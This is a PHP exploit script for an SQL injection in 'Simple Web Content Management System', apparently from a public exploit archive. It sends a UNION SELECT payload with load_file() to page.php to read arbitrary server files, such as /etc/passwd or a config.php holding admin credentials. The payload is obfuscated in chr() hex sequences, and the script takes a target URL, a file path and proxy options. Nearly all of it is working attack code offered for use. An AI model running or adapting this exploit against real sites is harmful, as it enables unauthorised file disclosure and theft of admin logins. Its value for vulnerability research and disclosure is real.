swcms.php.txt

`#!/usr/bin/php  
<?php  
  
/**  
* This file require the PhpSploit class.  
* If you want to use this class, the latest  
* version can be downloaded from acid-root.new.fr.  
**/  
require("phpsploitclass.php");  
  
  
if($argc < 3) {  
print("  
--------------------------------------------------------  
Affected.scr..: Simple Web Content Management System  
Poc.ID........: 18070102  
Type..........: SQL Injection  
Risk.level....: Medium  
Src.download..: www.cms-center.com  
Poc.link......: acid-root.new.fr/poc/18070102.txt  
Credits.......: DarkFig  
--------------------------------------------------------  
Usage.........: php xpl.txt <url> <file>  
Options.......: <proxhost:proxport> <proxuser:proxpass>  
Example.......: php xpl.txt http://hihi.org/ /etc/passwd  
--------------------------------------------------------\n");  
exit(1);  
}  
  
$url =$argv[1];$file =$argv[2];  
$proxh=$argv[3];$proxa=$argv[4];  
  
$xpl = new phpsploit();  
$xpl->agent("Mozilla");  
if($proxh) $xpl->proxy($proxh);  
if($proxa) $xpl->proxyauth($proxa);  
  
/*  
* $id = $_GET['id'];  
* $query = "SELECT * from content WHERE id = $id";  
* ...  
* @return $row->text;  
*  
* Simple SQL injection (register_globals=off ; magic_quotes_gpc=on).  
* What we want is not in the database, it's in a file (config.php):  
*  
* //this are the logins for the admin part. Change them for security.   
* $login = "test"; //your login for the admin section.  
* $pass = "1234"; //your login for the admin section.  
*  
* PS: Les chr() ont été utilisés dans le but de se foutre de  
* la gueule des personnes l'utilisant seulement pour d4 h4x0r styl3 =).  
*  
*/  
  
$header =  
chr(0x2f).chr(0x3c).chr(0x68).chr(0x74).chr(0x6d).chr(0x6c).chr(0x3e).chr(0x0d).  
chr(0x0a).chr(0x3c).chr(0x68).chr(0x65).chr(0x61).chr(0x64).chr(0x3e).chr(0x0d).  
chr(0x0a).chr(0x3c).chr(0x74).chr(0x69).chr(0x74).chr(0x6c).chr(0x65).chr(0x3e).  
chr(0x63).chr(0x6f).chr(0x6e).chr(0x74).chr(0x65).chr(0x6e).chr(0x74).chr(0x66).  
chr(0x72).chr(0x61).chr(0x6d).chr(0x65).chr(0x3c).chr(0x5c).chr(0x2f).chr(0x74).  
chr(0x69).chr(0x74).chr(0x6c).chr(0x65).chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).  
chr(0x6c).chr(0x69).chr(0x6e).chr(0x6b).chr(0x20).chr(0x68).chr(0x72).chr(0x65).  
chr(0x66).chr(0x3d).chr(0x22).chr(0x5c).chr(0x2f).chr(0x73).chr(0x74).chr(0x79).  
chr(0x6c).chr(0x65).chr(0x2e).chr(0x63).chr(0x73).chr(0x73).chr(0x22).chr(0x20).  
chr(0x72).chr(0x65).chr(0x6c).chr(0x3d).chr(0x22).chr(0x73).chr(0x74).chr(0x79).  
chr(0x6c).chr(0x65).chr(0x73).chr(0x68).chr(0x65).chr(0x65).chr(0x74).chr(0x22).  
chr(0x20).chr(0x74).chr(0x79).chr(0x70).chr(0x65).chr(0x3d).chr(0x22).chr(0x74).  
chr(0x65).chr(0x78).chr(0x74).chr(0x5c).chr(0x2f).chr(0x63).chr(0x73).chr(0x73).  
chr(0x22).chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x6d).chr(0x65).chr(0x74).  
chr(0x61).chr(0x20).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x2d).chr(0x65).  
chr(0x71).chr(0x75).chr(0x69).chr(0x76).chr(0x3d).chr(0x22).chr(0x43).chr(0x6f).  
chr(0x6e).chr(0x74).chr(0x65).chr(0x6e).chr(0x74).chr(0x2d).chr(0x54).chr(0x79).  
chr(0x70).chr(0x65).chr(0x22).chr(0x20).chr(0x63).chr(0x6f).chr(0x6e).chr(0x74).  
chr(0x65).chr(0x6e).chr(0x74).chr(0x3d).chr(0x22).chr(0x74).chr(0x65).chr(0x78).  
chr(0x74).chr(0x5c).chr(0x2f).chr(0x68).chr(0x74).chr(0x6d).chr(0x6c).chr(0x3b).  
chr(0x20).chr(0x63).chr(0x68).chr(0x61).chr(0x72).chr(0x73).chr(0x65).chr(0x74).  
chr(0x3d).chr(0x69).chr(0x73).chr(0x6f).chr(0x2d).chr(0x38).chr(0x38).chr(0x35).  
chr(0x39).chr(0x2d).chr(0x31).chr(0x22).chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).  
chr(0x5c).chr(0x2f).chr(0x68).chr(0x65).chr(0x61).chr(0x64).chr(0x3e).chr(0x0d).  
chr(0x0a).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x62).chr(0x6f).chr(0x64).chr(0x79).  
chr(0x3e).chr(0x2f);  
  
$sql =  
chr(0x70).chr(0x61).chr(0x67).chr(0x65).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).  
chr(0x3f).chr(0x69).chr(0x64).chr(0x3d).chr(0x2d).chr(0x31).chr(0x2f).chr(0x2a).  
chr(0x2a).chr(0x2f).chr(0x75).chr(0x6e).chr(0x69).chr(0x6f).chr(0x6e).chr(0x2f).  
chr(0x2a).chr(0x2a).chr(0x2f).chr(0x73).chr(0x65).chr(0x6c).chr(0x65).chr(0x63).  
chr(0x74).chr(0x2f).chr(0x2a).chr(0x2a).chr(0x2f).chr(0x6e).chr(0x75).chr(0x6c).  
chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).chr(0x6e).  
chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c).  
chr(0x2c).chr(0x6c).chr(0x6f).chr(0x61).chr(0x64).chr(0x5f).chr(0x66).chr(0x69).  
chr(0x6c).chr(0x65).chr(0x28).chr(0x63).chr(0x6f).chr(0x6e).chr(0x63).chr(0x61).  
chr(0x74).chr(0x28).concatcharfu($file).chr(0x29).chr(0x29).chr(0x2c).chr(0x6e).  
chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c).  
chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c);  
  
$footer =  
chr(0x2f).chr(0x3c).chr(0x5c).chr(0x2f).chr(0x62).chr(0x6f).chr(0x64).chr(0x79).  
chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x5c).chr(0x2f).chr(0x68).chr(0x74).  
chr(0x6d).chr(0x6c).chr(0x3e).chr(0x2f);  
  
$xpl->get($url.$sql);  
$ct = preg_replace($footer,'',$xpl->getcontent());  
print preg_replace($header,'',$ct);  
  
function concatcharfu($file)  
{  
$dat = '';  
for($i=0;$i<strlen($file);$i++)  
{  
$dat .= 'char('.ord($file[$i]).')';  
if($i != (strlen($file)-1)) $dat .= ',';  
}  
return $dat;  
}  
  
?>  
`